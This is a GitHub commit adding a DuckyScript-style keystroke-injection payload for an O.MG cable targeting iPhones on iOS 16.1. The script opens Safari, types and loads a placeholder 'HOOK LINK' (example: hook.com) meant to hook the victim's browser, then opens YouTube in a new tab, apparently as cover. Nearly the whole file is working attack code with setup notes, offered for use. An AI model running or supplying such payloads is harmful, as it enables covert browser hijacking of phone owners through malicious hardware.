Create payload.txt

pull/104/head
Peaakss 2022-10-21 21:45:50 -04:00 committed by GitHub
parent 10ea18fb8d
commit ebd6ab5377
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 30 additions and 0 deletions

View File

@ -0,0 +1,30 @@
REM Version 1.0
REM OS: iOS
REM Author: Peaakss
REM Description: A simple payload that opens safari and inserts a hook link then opens a new tab on youtube
REM NOTICE CHANGE "HOOK LINK" to your desired link | EXAMPLE: STRING hook.com |
REM NOITCE Payload was made on iOS 16.1 - iPhone | Timing may have have to be changed based on version/model
REM NOTICE Lighting to USB-A or USB-C camera adapter is needed to run this payload, ative end of the O.MG cable must be plugged into the end of the adapter
GUI h
DELAY 100
GUI SPACE
DELAY 150
BACKSPACE
DELAY 250
STRING Safari
DELAY 100
ENTER
DELAY 500
GUI t
DELAY 250
GUI l
DELAY 100
STRING "HOOK LINK"
DELAY 250
ENTER
GUI t
DELAY 100
STRING www.youtube.com
DELAY 250
ENTER